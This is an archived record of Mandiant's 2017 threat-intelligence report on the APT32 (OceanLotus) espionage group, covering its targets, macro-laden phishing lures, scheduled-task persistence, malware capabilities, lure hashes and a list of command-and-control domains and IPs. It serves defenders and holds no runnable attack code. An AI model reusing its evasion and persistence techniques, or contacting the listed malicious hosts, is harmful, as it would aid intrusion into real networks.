{ "id": "a7533052-9a64-4da5-9f00-7daaf4f84fe6", "created_at": "2026-04-06T00:21:35.983104Z", "updated_at": "2026-04-10T13:12:15.037459Z", "deleted_at": null, "sha1_hash": "272dc619d21855eb7060799ac46c95d910de76dc", "title": "Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 919211, "plain_text": "Cyber Espionage is Alive and Well: APT32 and the Threat to\r\nGlobal Corporations | Mandiant\r\nBy Mandiant\r\nPublished: 2017-05-14 · Archived: 2026-04-05 15:34:14 UTC\r\nCyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions\r\ninto private sector companies across multiple industries and have also targeted foreign governments, dissidents,\r\nand journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction\r\nwith commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.\r\nAPT32 and FireEye’s Community Response\r\nIn the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye’s\r\nMandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a\r\nsignificant intrusion campaign. In March 2017, in response to active targeting of FireEye clients, the team\r\nlaunched a Community Protection Event (CPE) – a coordinated effort between Mandiant incident responders,\r\nFireEye as a Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering – to protect all clients\r\nfrom APT32 activity.\r\nIn the following weeks, FireEye released threat intelligence products and updated malware profiles to customers\r\nwhile developing new detection techniques for APT32’s tools and phishing lures. This focused intelligence and\r\ndetection effort led to new external victim identifications as well as providing sufficient technical evidence to link\r\ntwelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye’s\r\nnewest named advanced persistent threat group: APT32.\r\nAPT32 Targeting of Private Sector Company Operations in Southeast Asia\r\nSince at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam’s\r\nmanufacturing, consumer products, and hospitality sectors. Furthermore, there are indications that APT32 actors\r\nare targeting peripheral network security and technology infrastructure corporations.\r\nHere is an overview of intrusions investigated by FireEye that are attributed to APT32:\r\nIn 2014, a European corporation was compromised prior to constructing a manufacturing facility in\r\nVietnam.\r\nIn 2016, Vietnamese and foreign-owned corporations working in network security, technology\r\ninfrastructure, banking, and media industries were targeted.\r\nIn mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a\r\nglobal hospitality industry developer with plans to expand operations into Vietnam.\r\nhttps://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html\r\nPage 1 of 12\n\nFrom 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located\r\ninside Vietnam, were the target of APT32 intrusion operations.\r\nTable 1 shows a breakdown of APT32 activity, including the malware families used in each.\r\nYear Country Industry Malware\r\n2014 Vietnam Network Security WINDSHIELD\r\n2014 Germany Manufacturing WINDSHIELD\r\n2015 Vietnam Media WINDSHIELD\r\n2016 Philippines Consumer products\r\nKOMPROGO\r\nWINDSHIELD\r\nSOUNDBITE\r\nBEACON\r\n2016 Vietnam Banking WINDSHIELD\r\n2016 Philippines Technology Infrastructure WINDSHIELD\r\n2016 China Hospitality WINDSHIELD\r\n2016 Vietnam Media WINDSHIELD\r\n2016 United States Consumer Products\r\nWINDSHIELD\r\nPHOREAL\r\nBEACON\r\nSOUNDBITE\r\nTable 1: APT32 Private Sector Targeting Identified by FireEye\r\nAPT32 Interest in Political Influence and Foreign Governments\r\nIn addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign\r\ngovernments, as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this\r\nactivity:\r\nA public blog published by the Electronic Frontier Foundation indicated that journalists, activists,\r\ndissidents, and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.\r\nIn 2014, APT32 leveraged a spear-phishing attachment titled “Plans to crackdown on protesters at the\r\nEmbassy of Vietnam.exe,\" which targeted dissident activity among the Vietnamese diaspora in Southeast\r\nAsia. Also in 2014, APT32 carried out an intrusion against a Western country’s national legislature.\r\nIn 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, released a report\r\ndetailing threat actors that were targeting Chinese public and private entities including government\r\nagencies, research institutes, maritime agencies, sea construction, and shipping enterprises. The\r\nhttps://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html\r\nPage 2 of 12\n\ninformation included in the report indicated that the perpetrators used the same malware, overlapping\r\ninfrastructure, and similar targets as APT32.\r\nIn 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be\r\nunique to APT32.\r\nIn 2017, social engineering content in lures used by the actor provided evidence that they were likely used\r\nto target members of the Vietnam diaspora in Australia as well as government employees in the\r\nPhilippines.\r\nAPT32 Tactics\r\nIn their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to\r\nentice the victim into enabling macros. Upon execution, the initialized file downloads multiple malicious payloads\r\nfrom remote servers. APT32 actors continue to deliver the malicious attachments via spear-phishing emails.\r\nAPT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files\r\nhad “.doc” file extensions, the recovered phishing lures were ActiveMime “.mht” web page archives that\r\ncontained text and images. These files were likely created by exporting Word documents into single file web\r\npages.\r\nTable 2 contains a sample of recovered APT32 multilingual lure files.\r\nActiveMime Lure Files MD5\r\n2017年员工工资性津贴额统计报告.doc\r\n(2017 Statistical Report on Staff Salary and Allowances)\r\n5458a2e4d784abb1a1127263bd5006b5\r\nThong tin.doc\r\n(Information)\r\nce50e544430e7265a45fab5a1f31e529\r\nPhan Vu Tutn CV.doc 4f761095ca51bfbbf4496a4964e41d4f\r\nKe hoach cuu tro nam 2017.doc\r\n(2017 Bailout Plan)\r\ne9abe54162ba4572c770ab043f576784\r\nInstructions to GSIS.doc fba089444c769700e47c6b44c362f96b\r\nHoi thao truyen thong doc lap.doc\r\n(Traditional Games)\r\nf6ee4b72d6d42d0c7be9172be2b817c1\r\nGiấy yêu cầu bồi thường mới 2016 - hằng.doc\r\n(New 2016 Claim Form)\r\naa1f85de3e4d33f31b4f78968b29f175\r\nHoa don chi tiet tien no.doc\r\n(Debt Details)\r\n5180a8d9325a417f2d8066f9226a5154\r\nThu moi tham du Hoi luan.doc\r\n(Collection of Participants)\r\nf6ee4b72d6d42d0c7be9172be2b817c1\r\nhttps://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html\r\nPage 3 of 12\n\nDanh sach nhan vien vi pham ky luat.doc\r\n(List of Employee Violations)\r\n6baafffa7bf960dec821b627f9653e44\r\nNội-dung-quảng-cáo.doc\r\n(Internal Content Advertising)\r\n471a2e7341f2614b715dc89e803ffcac\r\nHĐ DVPM-VTC 31.03.17.doc f1af6bb36cdf3cff768faee7919f0733\r\nTable 2: Sampling of APT32 Lure Files\r\nThe Base64 encoded ActiveMime data also contained an OLE file with malicious macros. When opened, many\r\nlure files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1\r\nshows a fake Gmail-theme paired with a hexadecimal error code that encourages the recipient to enable content to\r\nresolve the error. Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error\r\nmessage instructing the recipient to enable content to properly display document font characters.\r\nFigure 1: Example APT32 Phishing Lure – Fake Gmail Error Message\r\nhttps://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html\r\nPage 4 of 12\n\nFigure 2: Example APT32 Phishing Lure – Fake Text Encoding Error Message\r\nAPT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the\r\ndistribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors\r\ninjected into memory.\r\nIn order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real-time,\r\nAPT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32\r\nabandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their\r\nActiveMime lures hosted externally on legitimate cloud storage services.\r\nTo enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page\r\nfunctionality of their ActiveMime documents to link to external images hosted on APT32 monitored\r\ninfrastructure.\r\nFigure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.\r\nFigure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking\r\nWhen a document with this feature is opened, Microsoft Word will attempt to download the external image, even\r\nif macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants\r\nsuspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When\r\nhttps://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html\r\nPage 5 of 12\n\ncombined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and\r\nconduct further analysis about victim organizations while monitoring the interest of security firms.\r\nOnce macros were enabled on the target system, the malicious macros created two named scheduled tasks as\r\npersistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an\r\napplication whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first\r\nbackdoor from APT32’s infrastructure and injected it into memory. The second named scheduled task, loaded as\r\nan XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary\r\nbackdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-\r\nspecific backdoor and the other scheduled task initialized a commercially-available backdoor as backup.\r\nTo illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered\r\nAPT32 lure “2017年员工工资性津贴额统计报告.doc”.\r\nFigure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks\r\nIn this example, a scheduled task named “Windows Scheduled Maintenance” was created to run Casey Smith’s\r\n“Squiblydoo” App Whitelisting bypass every 30 minutes. While all payloads can be dynamically updated, at the\r\ntime of delivery, this task launched a COM scriptlet (“.sct” file extension) that downloaded and executed\r\nMeterpreter hosted on images.chinabytes[.]info. Meterpreter then loaded Cobalt Strike BEACON, configured to\r\ncommunicate with 80.255.3[.]87 using the Safebrowsing malleable C2 profile to further blend in with network\r\ntraffic. A second scheduled task named “Scheduled Defrags” was created by loading the raw task XML with a\r\nbackdated task creation timestamp of June 2, 2016. This second task ran “mshta.exe” every 50 minutes which\r\nlaunched an APT32-specific backdoor delivered as shellcode in a PowerShell script, configured to communicate\r\nwith the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.\r\nFigure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two\r\nmulti-stage malware frameworks into memory.\r\nhttps://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html\r\nPage 6 of 12\n\nFigure 5: APT32 Phishing Chain of Events\r\nThe impressive APT32 operations did not stop after they established a foothold in victim environments. Several\r\nMandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and\r\nheavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon’s Invoke-Obfuscation framework.\r\nhttps://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html\r\nPage 7 of 12\n\nAPT32 regularly used stealthy techniques to blend in with legitimate user activity:\r\nDuring one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255)\r\nmasquerading as a Windows hotfix.\r\nIn another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as\r\na software deployment task in which all systems pulled the payload from the ePO server using the\r\nproprietary SPIPE protocol.\r\nAPT32 also used hidden or non-printing characters to help visually camouflage their malware on a system.\r\nFor example, APT32 installed one backdoor as a persistent service with a legitimate service name that had\r\na Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL\r\nfilename padded with a non-printing OS command control code.\r\nAPT32 Malware and Infrastructure\r\nAPT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning\r\nmultiple protocols. APT32 operations are characterized through deployment of signature malware payloads\r\nincluding WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors\r\nalong with the commercially-available Cobalt Strike BEACON backdoor. APT32 may also possess backdoor\r\ndevelopment capabilities for macOS.\r\nThe capabilities for this unique suite of malware is shown in Table 3.\r\nMalware Capabilities\r\nWINDSHIELD\r\nCommand and control (C2) communications via TCP raw sockets\r\nFour configured C2s and six configured ports – randomly-chosen C2/port for\r\ncommunications\r\nRegistry manipulation\r\nGet the current module's file name\r\nGather system information including registry values, user name, computer\r\nname, and current code page\r\nFile system interaction including directory creation, file deletion, reading,\r\nand writing files\r\nLoad additional modules and execute code\r\nTerminate processes\r\nAnti-disassembly\r\nhttps://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html\r\nPage 8 of 12\n\nKOMPROGO\r\nFully-featured backdoor capable of process, file, and registry management\r\nCreating a reverse shell\r\nFile transfers\r\nRunning WMI queries\r\nRetrieving information about the infected system\r\nSOUNDBITE\r\nC2 communications via DNS\r\nProcess creation\r\nFile upload\r\nShell command execution\r\nFile and directory enumeration/manipulation\r\nWindow enumeration\r\nRegistry manipulation\r\nSystem information gathering\r\nPHOREAL\r\nC2 communications via ICMP\r\nReverse shell creation\r\nFilesystem manipulation\r\nRegistry manipulation\r\nProcess creation\r\nFile upload\r\nBEACON (Cobalt\r\nStrike)\r\nPublicly available payload that can inject and execute arbitrary code into\r\nprocesses\r\nImpersonating the security context of users\r\nImporting Kerberos tickets\r\nUploading and downloading files\r\nExecuting shell commands\r\nConfigured with malleable C2 profiles to blend in with normal network\r\ntraffic\r\nCo-deployment and interoperability with Metasploit framework\r\nSMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2\r\nand pivoting over SMB\r\nTable 3: APT32 Malware and Capabilities\r\nAPT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as\r\ncommand and control infrastructure. The FireEye iSIGHT Intelligence MySIGHT Portal contains additional\r\ninformation on these backdoor families based on Mandiant investigations of APT32 intrusions.\r\nhttps://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html\r\nPage 9 of 12\n\nFigure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.\r\nFigure 6: APT32 Attack Lifecycle\r\nOutlook and Implications\r\nBased on incident response investigations, product detections, and intelligence observations along with additional\r\npublications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with\r\nVietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye\r\nbelieves the actor poses significant risk to companies doing business in, or preparing to invest in, the country.\r\nWhile the motivation for each APT32 private sector compromise varied – and in some cases was unknown – the\r\nunauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption\r\nmeasures that could ultimately erode the competitive advantage of targeted organizations. Furthermore, APT32\r\ncontinues to threaten political activism and free speech in Southeast Asia and the public sector worldwide.\r\nGovernments, journalists, and members of the Vietnam diaspora may continue to be targeted.\r\nWhile actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked\r\nand responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic\r\ncapability. APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper\r\ninvestment and the flexibility to embrace newly-available tools and techniques. As more countries utilize\r\ninexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed\r\ndialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets.\r\nAPT32 Detection\r\nFigure 7 contains a Yara rule can be used to identify malicious macros associated with APT32’s phishing lures:\r\nhttps://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html\r\nPage 10 of 12\n\nFigure 7: Yara Rule for APT32 Malicious Macros\r\nTable 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.\r\nC2 Infrastructure    \r\n103.53.197.202 104.237.218.70 104.237.218.72\r\n185.157.79.3 193.169.245.78 193.169.245.137\r\n23.227.196.210 24.datatimes.org 80.255.3.87\r\nblog.docksugs.org blog.panggin.org contay.deaftone.com\r\ncheck.paidprefund.org datatimes.org docksugs.org\r\neconomy.bloghop.org emp.gapte.name facebook-cdn.net\r\ngap-facebook.com gl-appspot.org help.checkonl.org\r\nhigh.expbas.net high.vphelp.net icon.torrentart.com\r\nimages.chinabytes.info imaps.qki6.com img.fanspeed.net\r\njob.supperpow.com lighpress.info menmin.strezf.com\r\nmobile.pagmobiles.info news.lighpress.info notificeva.com\r\nnsquery.net pagmobiles.info paidprefund.org\r\npush.relasign.org relasign.org share.codehao.net\r\nseri.volveri.net ssl.zin0.com static.jg7.org\r\nsyn.timeizu.net teriava.com timeizu.net\r\nhttps://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html\r\nPage 11 of 12\n\ntonholding.com tulationeva.com untitled.po9z.com\r\nupdate-flashs.com vieweva.com volveri.net\r\nvphelp.net yii.yiihao126.net zone.apize.net\r\nTable 4: Sampling of APT32 C2 Infrastructure\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html\r\nhttps://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html\r\nPage 12 of 12\n\n https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html \nFigure 5: APT32 Phishing Chain of Events \nThe impressive APT32 operations did not stop after they established a foothold in victim environments. Several\nMandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and\nheavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon’s Invoke\u0002\nObfuscation framework. \n Page 7 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "Malpedia", "MITRE" ], "origins": [ "web" ], "references": [ "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" ], "report_names": [ "cyber-espionage-apt32.html" ], "threat_actors": [ { "id": "af509bbb-8d18-4903-a9bd-9e94099c6b30", "created_at": "2023-01-06T13:46:38.585525Z", "updated_at": "2026-04-10T02:00:03.030833Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "OceanLotus", "ATK17", "G0050", "APT-C-00", "APT-32", "Canvas Cyclone", "SeaLotus", "Ocean Buffalo", "OceanLotus Group", "Cobalt Kitty", "Sea Lotus", "APT 32", "POND LOACH", "TIN WOODLAWN", "Ocean Lotus" ], "source_name": "MISPGALAXY:APT32", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "870f6f62-84f5-48ca-a18e-cf2902cd6924", "created_at": "2022-10-25T15:50:23.303818Z", "updated_at": "2026-04-10T02:00:05.301184Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "APT32", "SeaLotus", "OceanLotus", "APT-C-00", "Canvas Cyclone" ], "source_name": "MITRE:APT32", "tools": [ "Mimikatz", "ipconfig", "Kerrdown", "Cobalt Strike", "SOUNDBITE", "OSX_OCEANLOTUS.D", "KOMPROGO", "netsh", "RotaJakiro", "PHOREAL", "Arp", "Denis", "Goopy" ], "source_id": "MITRE", "reports": null }, { "id": "5da6b5fd-1955-412a-81aa-069fb50b6e31", "created_at": "2025-08-07T02:03:25.116085Z", "updated_at": "2026-04-10T02:00:03.668978Z", "deleted_at": null, "main_name": "TIN WOODLAWN", "aliases": [ "APT32 ", "Cobalt Kitty", "OceanLotus", "WOODLAWN " ], "source_name": "Secureworks:TIN WOODLAWN", "tools": [ "Cobalt Strike", "Denis", "Goopy", "JEShell", "KerrDown", "Mimikatz", "Ratsnif", "Remy", "Rizzo", "RolandRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2439ad53-39cc-4fff-8fdf-4028d65803c0", "created_at": "2022-10-25T16:07:23.353204Z", "updated_at": "2026-04-10T02:00:04.55407Z", "deleted_at": null, "main_name": "APT 32", "aliases": [ "APT 32", "APT-C-00", "APT-LY-100", "ATK 17", "G0050", "Lotus Bane", "Ocean Buffalo", "OceanLotus", "Operation Cobalt Kitty", "Operation PhantomLance", "Pond Loach", "SeaLotus", "SectorF01", "Tin Woodlawn" ], "source_name": "ETDA:APT 32", "tools": [ "Agentemis", "Android.Backdoor.736.origin", "AtNow", "Backdoor.MacOS.OCEANLOTUS.F", "BadCake", "CACTUSTORCH", "CamCapture Plugin", "CinaRAT", "Cobalt Strike", "CobaltStrike", "Cuegoe", "DKMC", "Denis", "Goopy", "HiddenLotus", "KOMPROGO", "KerrDown", "METALJACK", "MSFvenom", "Mimikatz", "Nishang", "OSX_OCEANLOTUS.D", "OceanLotus", "PHOREAL", "PWNDROID1", "PhantomLance", "PowerSploit", "Quasar RAT", "QuasarRAT", "RatSnif", "Remy", "Remy RAT", "Rizzo", "Roland", "Roland RAT", "SOUNDBITE", "Salgorea", "Splinter RAT", "Terracotta VPN", "Yggdrasil", "cobeacon", "denesRAT", "fingerprintjs2" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434895, "ts_updated_at": 1775826735, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/272dc619d21855eb7060799ac46c95d910de76dc.pdf", "text": "https://archive.orkl.eu/272dc619d21855eb7060799ac46c95d910de76dc.txt", "img": "https://archive.orkl.eu/272dc619d21855eb7060799ac46c95d910de76dc.jpg" } }